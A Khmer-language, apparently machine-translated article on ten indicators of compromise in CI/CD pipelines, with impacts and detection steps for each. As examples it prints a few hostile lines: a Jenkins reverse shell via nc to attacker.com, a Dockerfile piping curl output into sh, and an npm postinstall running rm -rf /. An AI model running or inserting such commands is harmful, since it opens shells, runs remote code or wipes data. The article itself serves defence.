សេចក្តីផ្តើម៖ តើសូចនាករនៃការសម្របសម្រួលក្នុងសន្តិសុខតាមអ៊ីនធឺណិតមានអ្វីខ្លះ?
សូចនាករនៃការសម្របសម្រួលគឺជាសញ្ញាព្រមានដំបូងដែលបង្ហាញថាប្រព័ន្ធរបស់អ្នក ឬ pipeline អាចនឹងត្រូវបានវាយប្រហារ។ និយាយឲ្យសាមញ្ញទៅ សូចនាករនៃការសម្របសម្រួល គឺជាស្លាកស្នាមដែលបន្សល់ទុកដោយអ្នកវាយប្រហារ ដូចជាចម្លែកៗ logins, ការផ្លាស់ប្តូរឯកសារ ឬមេរោគដែលលាក់។ នៅក្នុង សន្តិសុខតាមអ៊ីនធឺណិតរបស់ IOCពួកវាដើរតួដូចជាស្នាមម្រាមដៃនៅកន្លែងកើតហេតុ ដោយផ្តល់ឱ្យអ្នកនូវភស្តុតាងច្បាស់លាស់ថាមានអ្វីមួយខុស។ ដូច្នេះ នៅពេលដែលអ្នកអភិវឌ្ឍន៍សួរ តើអ្វីជាសូចនាករនៃការសម្របសម្រួលចម្លើយមិនត្រឹមតែកំណត់ចំពោះម៉ាស៊ីនមេ ឬជញ្ជាំងភ្លើងប៉ុណ្ណោះទេ វាក៏រួមបញ្ចូលទាំងហានិភ័យដែលលាក់ទុកនៅក្នុងសម័យទំនើបផងដែរ។ CI/CD pipelines.
នៅក្នុងទាំងនេះ pipelines អ្នកវាយប្រហារអាចកែប្រែកូដ បញ្ចូលការពឹងផ្អែកដែលមានគំនិតអាក្រក់ ឬផ្លាស់ប្តូរជំហានបង្កើតដោយមិនត្រូវបានកត់សម្គាល់។ ទោះជាយ៉ាងណាក៏ដោយ មគ្គុទ្ទេសក៍ភាគច្រើននៅតែផ្តោតតែលើម៉ាស៊ីនមេ ឬបណ្តាញប៉ុណ្ណោះ។ ជាលទ្ធផល ខ្សែសង្វាក់ផ្គត់ផ្គង់កម្មវិធីបានក្លាយជាគោលដៅងាយស្រួលបំផុតមួយ។
នោះហើយជាមូលហេតុដែលការស្វែងរកសូចនាករនៃការសម្របសម្រួលនៅក្នុង CI/CD pipelines គឺមានសារៈសំខាន់។ លើសពីនេះទៅទៀត វាជួយក្រុមនានាទប់ស្កាត់មេរោគ ការពារអាថ៌កំបាំង និងធានាសុវត្ថិភាពគ្រប់ជំហាននៃការចែកចាយកម្មវិធី។
សូចនាករកំពូលទាំង ១០ នៃការសម្របសម្រួលក្នុង CI/CD Pipelines
នៅពេលពន្យល់ពីសូចនាករនៃការសម្របសម្រួល បញ្ជីភាគច្រើនផ្តោតលើម៉ាស៊ីនមេ ឬបណ្តាញ។ យ៉ាងណាក៏ដោយ CI/CD pipelines អ្នកវាយប្រហារបន្សល់ទុកស្នាមម្រាមដៃខុសៗគ្នា។ ការទទួលស្គាល់សញ្ញាទាំងនេះគឺមានសារៈសំខាន់សម្រាប់ការការពារជាមុន។ ខាងក្រោមនេះគឺជាសញ្ញាសម្គាល់ចំនួន 10 របស់ IOC អំពីសន្តិសុខតាមអ៊ីនធឺណិត ដែលអ្នកអភិវឌ្ឍន៍ និងវិស្វករសន្តិសុខគ្រប់រូបគួរតែតាមដាន។
១. ការផ្លាស់ប្តូរការពឹងផ្អែកគួរឱ្យសង្ស័យ
សូចនាករសំខាន់មួយនៃការសម្របសម្រួលនៅក្នុង pipelines គឺជាការអាប់ដេតភាពអាស្រ័យភ្លាមៗ និងចម្លែក។ អ្នកវាយប្រហារច្រើនតែប្រើអ្នកអភិវឌ្ឍន៍ទំនុកចិត្តដែលដាក់ក្នុងកម្មវិធីគ្រប់គ្រងកញ្ចប់ដើម្បីបន្ថែមកញ្ចប់ដ៏គ្រោះថ្នាក់។
ឧទាហរណ៍ ក្នុង npm a package.json ភាពខុសគ្នាភ្លាមៗអាចរួមមាន៖
ការផ្លាស់ប្តូរបែបនេះអាចមើលទៅមានសុវត្ថិភាព ប៉ុន្តែអាចចាក់បញ្ចូលកូដដែលមានមេរោគ Trojan ទៅក្នុងគ្រប់ build ទាំងអស់។
ផលប៉ះពាល់: ការបង្កើតដែលរងការសម្របសម្រួលទទួលមរតកមេរោគនៅប្រភព។
ការរកឃើញ៖ អនុវត្តការពិនិត្យឡើងវិញអំពីការពឹងផ្អែក តាមដានភាពខុសគ្នានៃឯកសារចាក់សោ និងស្កេនកញ្ចប់ថ្មីៗគ្រប់ពេល។
2. កូដដែលបានបិទបាំងក្នុងការបង្កើតកម្មវិធី
អ្នកនិពន្ធមេរោគពឹងផ្អែកលើការបិទបាំងដើម្បីរំលងការពិនិត្យឡើងវិញ។ ជាលទ្ធផល សូចនាករនៃការសម្របសម្រួលនេះនៅក្នុង CI/CD pipelines អាចជាផ្នែកមួយដែលពិបាកចាប់បំផុត។ តាមពិតទៅ payloads ដែលត្រូវបានបិទបាំងជារឿយៗរអិលចូលទៅក្នុងបណ្ណាល័យប្រភពបើកចំហ ឬរូបភាពកុងតឺន័រដោយមិនមានការជូនដំណឹង។
ឧទាហរណ៍:
- កញ្ចប់ PyPI ដោយប្រើ
base64.b64decode("cHJpbnQoSGFja2VkKQ=="). - រូបភាព Docker ដែលពោរពេញទៅដោយប្រព័ន្ធគោលពីរ UPX ដែលមិនចាំបាច់។
- JavaScript ពោរពេញដោយ
\x41\x42រត់គេចខ្លួនដោយលាក់ខ្លួនពីអ្នកលួចអត្តសញ្ញាណប័ណ្ណ។
ផលប៉ះពាល់: កូដដែលលាក់ទុកដំណើរការដោយស្ងៀមស្ងាត់ក្នុងអំឡុងពេលបង្កើត ឬពេលដំណើរការ ដែលធ្វើឱ្យនេះជាសញ្ញាសំខាន់មួយនៅក្នុងសន្តិសុខតាមអ៊ីនធឺណិតរបស់ IOC។
ការរកឃើញ៖ ផ្សំ SAST ជាមួយនឹងការស្កេនមេរោគ ដើម្បីសម្គាល់កូដដែលបានអ៊ិនកូដ ឬកូដដែលបានវេចខ្ចប់។ លើសពីនេះទៅទៀត សូមចាត់ទុកការបិទបាំងជាសញ្ញាគ្រោះថ្នាក់ដែលសមនឹងទទួលបានការស៊ើបអង្កេតបន្ថែមទៀត។
៣. អាថ៌កំបាំងដែលត្រូវបានលាតត្រដាងនៅក្នុង Git៖ ហានិភ័យសន្តិសុខតាមអ៊ីនធឺណិត IOC បុរាណ
CI/CD pipelineជារឿយៗ s ទទួលមរតកអាថ៌កំបាំងដោយផ្ទាល់ពីឃ្លាំង។ ទោះជាយ៉ាងណាក៏ដោយ នៅពេលដែលអាថ៌កំបាំងលេចឡើងនៅក្នុង Gitពួកគេក្លាយជាចម្លើយច្បាស់លាស់បំផុតមួយចំពោះសំណួរថា "តើអ្វីទៅជាសូចនាករនៃការសម្របសម្រួលនៅក្នុង pipelines?” នៅពេលដែលព័ត៌មានសម្ងាត់ចុះចតនៅក្នុង Git អ្នកវាយប្រហារអាចកេងប្រវ័ញ្ចពួកវាដោយគ្មានកំណត់។
ឧទាហរណ៍:
- A
.envឯកសារដែលមានAWS_SECRET_KEY=. - ថូខឹនត្រូវបានរុញចូល
config.json. - អាថ៌កំបាំងនៅតែអាចមើលឃើញនៅក្នុងប្រវត្តិ Git សូម្បីតែបន្ទាប់ពីដកចេញក៏ដោយ។
ផលប៉ះពាល់: កូនសោដែលលាតត្រដាងផ្តល់ឱ្យអ្នកវាយប្រហារនូវសិទ្ធិចូលប្រើដោយផ្ទាល់ទៅកាន់ CI/CD pipelineប្រព័ន្ធពពក ឬមូលដ្ឋានទិន្នន័យ។ ដូច្នេះ នេះគឺជាសូចនាករមួយក្នុងចំណោមសូចនាករដ៏គ្រោះថ្នាក់បំផុតនៃការសម្របសម្រួល។
ការរកឃើញ៖ ការប្រើ pre-commit hooks និងការងារ CI សម្រាប់ការស្កេនសម្ងាត់ ហើយដកហូតសោដែលលេចធ្លាយភ្លាមៗ។ លើសពីនេះ អនុវត្តការកែតម្រូវដោយស្វ័យប្រវត្តិ ដើម្បីកាត់បន្ថយបង្អួចដែលប៉ះពាល់។
៤. មានការក្លែងបន្លំ Pipeline ការកំណត់រចនាសម្ព័ន្ធ៖ សូចនាករលាក់កំបាំងនៃការសម្របសម្រួល
Pipeline ការកំណត់រចនាសម្ព័ន្ធគឺជាគោលដៅតម្លៃខ្ពស់ពីព្រោះ ការកែប្រែតែមួយជារឿយៗធ្វើឱ្យខូចដំណើរការការងារទាំងមូល។ ជាលទ្ធផល ត្រូវបានក្លែងបន្លំ pipeline ឯកសារទាំងនោះគឺជាហានិភ័យសន្តិសុខតាមអ៊ីនធឺណិតដ៏សំខាន់របស់ IOC ដែលឧបករណ៍ត្រួតពិនិត្យបែបប្រពៃណីកម្ររកឃើញណាស់។
ឧទាហរណ៍:
នៅក្នុង GitHub សកម្មភាព៖
- នៅក្នុង GitLab៖ ការងារព្យាបាទមួយត្រូវបានបន្ថែមទៅ
.gitlab-ci.ymlដែលបោះចោលទិន្នន័យរសើប។ - នៅ Jenkins៖
sh "nc -e /bin/bash attacker.com 4444".
ផលប៉ះពាល់: ការផ្លាស់ប្តូរដែលមិនត្រូវបានអនុម័តទាំងនេះធ្វើឱ្យអ្នក pipeline ចូលទៅក្នុងទ្វារក្រោយអចិន្ត្រៃយ៍សម្រាប់អ្នកវាយប្រហារ ដែលច្បាស់ជារាប់ជាសូចនាករនៃការសម្របសម្រួល។
ការរកឃើញ៖ អនុវត្តការកំណត់រចនាសម្ព័ន្ធដែលបានចុះហត្ថលេខា តម្រូវឱ្យមានការយល់ព្រមពី PR និងតាមដានការងារដែលមិនបានរំពឹងទុក។ លើសពីនេះ សូមកំណត់ guardrails ដែលរារាំងលំហូរការងារដែលបានផ្លាស់ប្តូរដោយស្វ័យប្រវត្តិ។
5. ឯកសិទ្ធិ IaC លំនាំដើម
ការកំណត់រចនាសម្ព័ន្ធដែលត្រូវបានកំណត់រចនាសម្ព័ន្ធមិនត្រឹមត្រូវជារឿយៗបង្កើតទ្វារក្រោយដែលលាក់។ ជាលទ្ធផល លំនាំដើមដែលមានសិទ្ធិនៅក្នុង IaC គឺជាហានិភ័យសន្តិសុខតាមអ៊ីនធឺណិតរបស់ IOC បុរាណ។
ឧទាហរណ៍:
- ផតផ្តល់សិទ្ធិដាក់ពង្រាយ Kubernetes
privileged: true. - តារាង Helm បង្ហាញសេវាកម្មជាមួយ
0.0.0.0:22.
ផលប៉ះពាល់: អ្នកវាយប្រហារទទួលបានសិទ្ធិចូលប្រើកម្រិត root ឬបង្ហាញសេវាកម្មផ្ទៃក្នុងជាសាធារណៈ។ ជាលទ្ធផល បញ្ហាទាំងនេះពង្រីកវិសាលភាពនៃការវាយប្រហារយ៉ាងខ្លាំង។
ការរកឃើញ៖ Apply IaC ការស្កេនដើម្បីអនុវត្តសិទ្ធិតិចតួចបំផុតមុនពេលបញ្ចូលគ្នា។ លើសពីនេះ ត្រូវប្រាកដថាការកំណត់រចនាសម្ព័ន្ធនីមួយៗត្រូវបានពិនិត្យឡើងវិញជាផ្នែកមួយនៃ pipeline.
៦. ឥរិយាបថសាងសង់មិនធម្មតា
អ្នកវាយប្រហារច្រើនតែផ្លាស់ប្តូរ pipeline ឥរិយាបថដើម្បីរអិលចូលក្នុងសកម្មភាពព្យាបាទ។ ម្យ៉ាងទៀត សកម្មភាពសាងសង់មិនធម្មតាគឺជាចម្លើយច្បាស់លាស់បំផុតមួយចំពោះអ្វីដែលជាសូចនាករនៃការសម្របសម្រួលក្នុង CI/CD pipelines.
ឧទាហរណ៍:
- Builds កំពុងធ្វើការស្នើសុំបណ្តាញទៅកាន់ដែនចម្លែកៗ។
- គម្រោង Node.js មួយស្រាប់តែបង្កើត PowerShell អំឡុងពេល
npm install. - ការងារ CI កំពុងទាញយកឯកសារគោលពីរធំៗដែលមិនបានកំណត់នៅក្នុងស្គ្រីបបង្កើត។
ផលប៉ះពាល់: ការបង្កើតដែលរងការគំរាមកំហែងអាចដើរតួជាចំណុចចែកចាយមេរោគ។ លើសពីនេះទៅទៀត ពួកវារីករាលដាលបន្ទុកផ្ទុកមេរោគនៅទូទាំងការដាក់ពង្រាយនីមួយៗ។
ការរកឃើញ៖ តាមដានកំណត់ហេតុបង្កើតសម្រាប់ដំណើរការ ឬការតភ្ជាប់ដែលមិនបានរំពឹងទុក។ លើសពីនេះ សូមកំណត់រចនាសម្ព័ន្ធការរកឃើញភាពមិនប្រក្រតីដើម្បីសម្គាល់ឥរិយាបថនៅខាងក្រៅបទដ្ឋាន។
៧. ស្គ្រីបកញ្ចប់ព្យាបាទជាហានិភ័យសន្តិសុខតាមអ៊ីនធឺណិតរបស់ IOC
កម្មវិធីគ្រប់គ្រងកញ្ចប់គាំទ្រវដ្តជីវិត hooks ដែលអ្នកវាយប្រហារកេងប្រវ័ញ្ច។ ដូច្នេះ ស្គ្រីបព្យាបាទនៅក្នុង npm, PyPI ឬ Dockerfiles គឺជាសូចនាករដ៏រឹងមាំនៃការសម្របសម្រួល។
ឧទាហរណ៍:
- npm៖
postinstallកំពុងដំណើរការស្គ្រីបrm -rf /ឬជាសញ្ញាទៅ C2។ - PyPI៖
setup.pyការប្រតិបត្តិកូដ Python ដែលលាក់នៅពេលដំឡើង។ - ឯកសារ Docker៖
RUN curl attacker.sh | sh.
ផលប៉ះពាល់: ការវាយប្រហារនេះដំណើរការកំឡុងពេលដំឡើង មុនពេលការធ្វើតេស្តពេលដំណើរការណាមួយ។ ជាលទ្ធផល អ្នកអភិវឌ្ឍន៍អាចនឹងមិនដែលកត់សម្គាល់រហូតដល់វាយឺតពេល។
ការរកឃើញ៖ ស្កេនកម្មវិធីបង្ហាញកញ្ចប់សម្រាប់ស្គ្រីបដំឡើង។ លើសពីនេះ សូមដាក់កម្រិតហានិភ័យ hooks in CI/CD ការងារដើម្បីកាត់បន្ថយការប៉ះពាល់។
៨. សូចនាករនៃការបំពុលបញ្ជីឈ្មោះនៃការសម្របសម្រួល
អ្នកវាយប្រហារជំនួស ឬកែប្រែវត្ថុបុរាណនៅក្នុងបញ្ជីឈ្មោះ ហើយព្រឹត្តិការណ៍ទាំងនេះគឺជាឧទាហរណ៍សៀវភៅសិក្សាអំពីអ្វីដែលជាសូចនាករនៃការសម្របសម្រួលនៅក្នុងខ្សែសង្វាក់ផ្គត់ផ្គង់។ pipelines.
ឧទាហរណ៍:
- ស្លាករូបភាព Docker ត្រូវបានធ្វើបច្ចុប្បន្នភាពដោយស្ងៀមស្ងាត់ជាមួយនឹងស្រទាប់ដែលមានមេរោគ Trojanized។
- កញ្ចប់ខាងក្នុងត្រូវបានជំនួសដោយកំណែដែលមានជាតិពុល។
- ការអង្គុយលើលំហឈ្មោះ npm ដូចជា
lodash-proxy.
ផលប៉ះពាល់: រាល់ការបង្កើតដែលប្រើប្រាស់ registry artifact នឹងត្រូវបានវាយប្រហារ។ មិនត្រឹមតែប៉ុណ្ណោះទេ ការគំរាមកំហែងនេះរីករាលដាលដល់សេវាកម្មខាងក្រោម។
ការរកឃើញ៖ អនុវត្តការត្រួតពិនិត្យហត្ថលេខា និងភាពសុចរិតលើការទាញយកបញ្ជីឈ្មោះទាំងអស់។ លើសពីនេះ តាមដានប្រភពដើមនៃវត្ថុបុរាណជាមួយ SBOM សុពលភាព។
៩. សកម្មភាពអ្នកប្រើប្រាស់មិនប្រក្រតីជាភស្តុតាងរបស់ IOC
គណនីដែលរងការលួចចូលស្ទើរតែតែងតែបន្សល់ទុកនូវស្លាកស្នាមមិនប្រក្រតី។ ដូច្នេះហើយ ឥរិយាបថមិនធម្មតារបស់អ្នកអភិវឌ្ឍន៍គឺជាសូចនាករដ៏រឹងមាំនៃការសម្របសម្រួល។
ឧទាហរណ៍:
- Commitបានរុញនៅម៉ោង ៣ ទៀបភ្លឺ ម៉ោងក្នុងស្រុក។
- ការអនុម័ត PR ដោយគណនីនៅវិស្សមកាល។
- Pipelines ត្រូវបានបង្កឡើងដោយភាពញឹកញាប់មិនធម្មតា។
ផលប៉ះពាល់: អ្នកវាយប្រហារប្រើប្រាស់ព័ត៌មានសម្ងាត់ដែលត្រូវបានលួច ដើម្បីបញ្ចូលការផ្លាស់ប្តូរដែលមានគំនិតអាក្រក់។ យ៉ាងណាមិញ ការមិនអនុញ្ញាត commitលាយបញ្ចូលគ្នាយ៉ាងងាយស្រួលទៅក្នុងលំហូរការងារធម្មតា។
ការរកឃើញ៖ កម្មវិធីត្រួតពិនិត្យ SCM សកម្មភាពសម្រាប់ភាពមិនប្រក្រតី អនុវត្ត MFA និងបង្វិលសញ្ញាសម្ងាត់ជាប្រចាំ។ លើសពីនេះ ត្រូវប្រុងប្រយ័ត្នចំពោះភាពគួរឱ្យសង្ស័យ commit ឬគំរូនៃការអនុម័ត។
១០. ការត្រួតពិនិត្យភាពសុចរិត ឬហត្ថលេខាបានបរាជ័យនៅក្នុងសន្តិសុខតាមអ៊ីនធឺណិតរបស់ IOC
ជារឿងធម្មតា ប៉ុន្តែត្រូវបានមើលរំលង សូចនាករនៃការសម្របសម្រួល គឺជាការត្រួតពិនិត្យភាពសុចរិត ឬហត្ថលេខាដែលបរាជ័យ។ នៅក្នុងសន្តិសុខតាមអ៊ីនធឺណិតរបស់ IOC ការត្រួតពិនិត្យទាំងនេះផ្ទៀងផ្ទាត់ថាកូដ ឬវត្ថុបុរាណមានភាពត្រឹមត្រូវ។ ការរំលងពួកវានឹងបន្សល់ទុក pipelines លាតត្រដាង។
ឧទាហរណ៍:
- ហាស SHA256 មិនត្រូវគ្នានឹង checksum ដែលរំពឹងទុកទេ។
- ហត្ថលេខា GPG បាត់ ឬមិនត្រឹមត្រូវ។
- An SBOM បង្ហាញវត្ថុបុរាណដែលមិនទាន់ចុះហត្ថលេខា។
ផលប៉ះពាល់: ការបរាជ័យនៃភាពសុចរិតជារឿយៗមានន័យថាការក្លែងបន្លំ ការបំពុលបញ្ជីឈ្មោះ ឬការចាក់មេរោគ។
ការរកឃើញ៖ ធ្វើឱ្យការត្រួតពិនិត្យហត្ថលេខាដោយស្វ័យប្រវត្តិ អនុវត្តការផ្ទៀងផ្ទាត់ checksum និងរារាំងសមាសធាតុដែលមិនទាន់ចុះហត្ថលេខា។ លើសពីនេះទៅទៀត សូមចាត់ទុកការត្រួតពិនិត្យដែលបរាជ័យនីមួយៗជាភស្តុតាងច្បាស់លាស់នៃការសម្របសម្រួល។
CI/CD សូចនាករនៃការសម្របសម្រួលដោយសង្ខេប
| សូចនាករនៃការសម្របសម្រួល (IOC) | ផលប៉ះពាល់នៅក្នុង CI/CD Pipelines | របៀបកំណត់ |
|---|---|---|
| ការផ្លាស់ប្តូរការពឹងផ្អែកគួរឱ្យសង្ស័យ | អ្នកវាយប្រហារបញ្ចូលបណ្ណាល័យព្យាបាទទៅក្នុងកម្មវិធីគ្រប់គ្រងកញ្ចប់ ដែលនាំឱ្យមានការបង្កើតដែលរងការគំរាមកំហែង។ | តាមដានភាពខុសគ្នានៃឯកសារចាក់សោ អនុវត្តការពិនិត្យឡើងវិញអំពីការពឹងផ្អែក និងស្កេនការពឹងផ្អែកជាបន្តបន្ទាប់។ |
| កូដដែលបានបិទបាំងក្នុងការបង្កើតថ្មី | បន្ទុកផ្ទុកទិន្នន័យដែលលាក់ទុកដំណើរការកំឡុងពេលសាងសង់ ឬពេលដំណើរការដោយគ្មានការរកឃើញ។ | ការប្រើ SAST និងការស្កេនមេរោគដើម្បីសម្គាល់លំនាំកូដ base64, hex ឬ packed។ |
| អាថ៌កំបាំងត្រូវបានបង្ហាញនៅក្នុង Git | ថូខឹន ឬសោ API ដែលលេចធ្លាយផ្តល់ឱ្យអ្នកវាយប្រហារនូវសិទ្ធិចូលប្រើដោយផ្ទាល់ទៅកាន់ប្រព័ន្ធសំខាន់ៗ។ | ដំណើរការការស្កេនសម្ងាត់នៅក្នុង Git hooks និងលុបចោលព័ត៌មានសម្ងាត់ដែលលេចធ្លាយដោយស្វ័យប្រវត្តិ។ |
| មានការក្លែងបន្លំ Pipeline Configurations | លំហូរការងារដែលបានកែប្រែអនុញ្ញាតឱ្យមានការលួចចូលទិន្នន័យ ឬការរក្សាទុកទិន្នន័យនៅខាងក្នុង CI/CD. | តម្រូវឱ្យមានការយល់ព្រមពី PR អនុវត្តការកំណត់រចនាសម្ព័ន្ធដែលបានចុះហត្ថលេខា និងតាមដាន pipeline ការផ្លាស់ប្តូរ។ |
| ឯកសិទ្ធិ។ IaC លំនាំដើម | តួនាទីដែលអនុញ្ញាតហួសហេតុពេក ឬលំនាំដើមដែលមិនមានសុវត្ថិភាពបង្ហាញបរិស្ថានពពក។ | ស្កេនឯកសារ Terraform, Kubernetes និង Helm សម្រាប់ការអនុវត្តសិទ្ធិតិចបំផុត។ |
| ឥរិយាបថសាងសង់មិនធម្មតា | Pipelineត្រូវបានប្រើជាចំណុចចែកចាយមេរោគ ឬសម្រាប់ចលនាចំហៀង។ | វិភាគកំណត់ហេតុបង្កើតសម្រាប់ការទាញយក ដំណើរការ ឬការហៅចេញដែលមិនបានរំពឹងទុក។ |
| ស្គ្រីបកញ្ចប់ព្យាបាទ | ស្គ្រីបមុន/ក្រោយការដំឡើងដែលលាក់នឹងបង្កឱ្យមានការផ្ទុកទិន្នន័យមុនពេលធ្វើតេស្តពេលដំណើរការ។ | រារាំងស្គ្រីប npm/PyPI ដែលមានហានិភ័យ និងដាក់កម្រិតការប្រតិបត្តិនៅក្នុង CI/CD ការងារ។ |
| ការពុលបញ្ជីឈ្មោះ | វត្ថុបុរាណ Trojanized ជំនួសរូបភាព ឬប្រព័ន្ធគោលពីរដែលគួរឱ្យទុកចិត្តនៅក្នុងបញ្ជីឈ្មោះ។ | ផ្ទៀងផ្ទាត់ checksums អនុវត្តការផ្ទៀងផ្ទាត់ហត្ថលេខា និងស្កេនបញ្ជីឈ្មោះដោយសកម្ម។ |
| សកម្មភាពអ្នកប្រើប្រាស់មិនប្រក្រតី | គណនីដែលរងការលួចចូលជំរុញឱ្យមានមេរោគ commits ឬ គន្លឹះ pipelines. | អនុវត្ត MFA ត្រួតពិនិត្យ commitសម្រាប់ភាពមិនប្រក្រតី និងវិភាគ login លំនាំ។ |
| ការត្រួតពិនិត្យភាពសុចរិត ឬហត្ថលេខាបានបរាជ័យ | បង្ហាញពីកូដ ការពឹងផ្អែក ឬរូបភាពដែលត្រូវបានកែប្រែដែលចូលទៅក្នុង pipeline. | ស្វ័យប្រវត្តិកម្មការត្រួតពិនិត្យភាពសុចរិត និងរារាំងសមាសធាតុដែលមិនបានចុះហត្ថលេខា ឬមិនត្រូវគ្នា។ |
ហេតុអ្វីបានជាសន្តិសុខតាមអ៊ីនធឺណិត IOC បែបប្រពៃណីខកខាន CI/CD ហានិភ័យ
អង្គការភាគច្រើនត្រួតពិនិត្យសូចនាករនៃការសម្របសម្រួលនៅលើម៉ាស៊ីនមេ កុំព្យូទ័រ ឬបណ្តាញរួចហើយ។ ទោះជាយ៉ាងណាក៏ដោយ វិធីសាស្រ្តបុរាណនេះចំពោះសន្តិសុខតាមអ៊ីនធឺណិត IOC មិនអើពើនឹង CI/CD pipelines ដែលឥឡូវនេះជាផ្ទៃវាយប្រហារដ៏សំខាន់បំផុតមួយ។ តាមពិតទៅ pipelineបង្ហាញសញ្ញាសម្របសម្រួលតែមួយគត់ដែលឧបករណ៍ប្រពៃណីមិនអាចរកឃើញ។
សូចនាករនៃការសម្របសម្រួលក្នុងសន្តិសុខប្រពៃណី
នៅក្នុងសន្តិសុខតាមអ៊ីនធឺណិត IOC ធម្មតា ការផ្តោតអារម្មណ៍ជាធម្មតាគឺទៅលើ៖
- មិនធម្មតា loginឬអាសយដ្ឋាន IP ដែលបង្ហាញពីព័ត៌មានសម្ងាត់ដែលត្រូវបានគេលួច។
- ការផ្លាស់ប្ដូរហាសឯកសារ ឬការផ្លាស់ប្ដូរបញ្ជីឈ្មោះគួរឲ្យសង្ស័យដែលបង្ហាញពីមេរោគ។
- ចរាចរណ៍ចេញដែលមិននឹកស្មានដល់ដែលចង្អុលទៅការលួចទិន្នន័យ។
ទាំងនេះគឺជាសូចនាករល្បីឈ្មោះដែលក៏ត្រូវបានតាមដាននៅក្នុង ក្របខ័ណ្ឌ MITER ATT&CKដែលគូសផែនទីឥរិយាបថ និងយុទ្ធសាស្ត្រទូទៅរបស់សត្រូវ។ ទាំងនេះគឺជាសញ្ញាមានប្រយោជន៍។ ទោះជាយ៉ាងណាក៏ដោយ ពួកវាអនុវត្តជាចម្បងចំពោះប្រព័ន្ធប្រតិបត្តិការ ឬបណ្តាញសាជីវកម្ម។ ជាលទ្ធផល ពួកវាខកខានការក្លែងបន្លំដ៏ស្រទន់ដែលកើតឡើងមុននេះនៅក្នុងខ្សែសង្វាក់ផ្គត់ផ្គង់កម្មវិធី។
ហេតុអ្វី CI/CD Pipelines មានភាពខុសគ្នា
CI/CD pipelines គឺជាបរិស្ថានស្វ័យប្រវត្តិដែលអ្នកអភិវឌ្ឍន៍ commit កូដ ការទាញយកភាពអាស្រ័យ និងការចេញផ្សាយ builds។ អ្នកវាយប្រហារដឹងថាការសម្របសម្រួលមួយនៅទីនេះកើតឡើងជាបន្តបន្ទាប់នៅទូទាំងការដាក់ពង្រាយនីមួយៗ។ ដូច្នេះ តើអ្វីជាសូចនាករនៃការសម្របសម្រួលនៅក្នុង CI/CD pipelineពួកវាមើលទៅខុសគ្នាខ្លាំងណាស់៖
- ការពឹងផ្អែកព្យាបាទមួយត្រូវបានបន្ថែមដោយស្ងាត់ៗទៅក្នុង package.json ឬ requirements.txt។
- កូនសោ API ឬថូខឹនត្រូវបានបង្ហាញនៅក្នុង Git commitឯកសារ s ឬ .env។
- កូដដែលបានបិទបាំងត្រូវបានចាក់ចូលទៅក្នុងកញ្ចប់ npm ឬ PyPI។
- ឯកសារ Terraform ឬ Kubernetes ដែលមានលំនាំដើមមិនមានសុវត្ថិភាពដូចជា privileged: true។
- Pipeline ការងារដែលត្រូវបានកែសម្រួលដើម្បីច្រោះទិន្នន័យ ឬបើកទ្វារខាងក្រោយ។
សញ្ញាសម្របសម្រួលទាំងនេះនៅក្នុង CI/CD នៅតែមើលមិនឃើញ standard ឧបករណ៍សុវត្ថិភាព។
គម្លាតនៃសន្តិសុខតាមអ៊ីនធឺណិតរបស់ IOC
ទោះបីជាក្រុមជាច្រើនយល់ពីតម្លៃនៃសូចនាករនៃការសម្របសម្រួលក៏ដោយ ពួកគេនៅតែពឹងផ្អែកតែលើការរកឃើញពីម៉ាស៊ីនមេ និងកំណត់ហេតុបណ្តាញប៉ុណ្ណោះ។ ដូច្នេះ អ្នកវាយប្រហារអាចបំពុលការបង្កើត ឬបញ្ចូលមេរោគដោយមិនបន្សល់ទុកដានធម្មតា។ នេះជាមូលហេតុដែលឧប្បត្តិហេតុដូចជាទ្វារក្រោយ XZ Utils ឬកញ្ចប់ npm ព្យាបាទមិនត្រូវបានរកឃើញរហូតដល់ពួកវាឈានដល់ការផលិត។
ការសម្របសម្រួលខ្សែសង្វាក់ផ្គត់ផ្គង់ប្រភេទនេះក៏ត្រូវបានគូសបញ្ជាក់ដោយ CISការណែនាំអំពីសុវត្ថិភាពខ្សែសង្វាក់ផ្គត់ផ្គង់របស់ Aដែលព្រមានថា អ្នកវាយប្រហារកំពុងកំណត់គោលដៅកាន់តែខ្លាំងឡើង CI/CD pipelines និងបញ្ជីឈ្មោះ។
Takeaway នេះ
សន្តិសុខតាមអ៊ីនធឺណិតបែបប្រពៃណីរបស់ IOC គឺចាំបាច់ ប៉ុន្តែមិនគ្រប់គ្រាន់ទេ។ លើសពីនេះទៅទៀត ក្រុមនានាត្រូវតែទទួលស្គាល់សូចនាករនៃការសម្របសម្រួលជាក់លាក់ចំពោះ CI/CD pipelines. មានតែពេលនោះទេដែលពួកគេអាចរកឃើញកូដព្យាបាទ ឬ pipeline ការរំលោភបំពានមុនពេលវារីករាលដាលពាសពេញបរិស្ថាន។




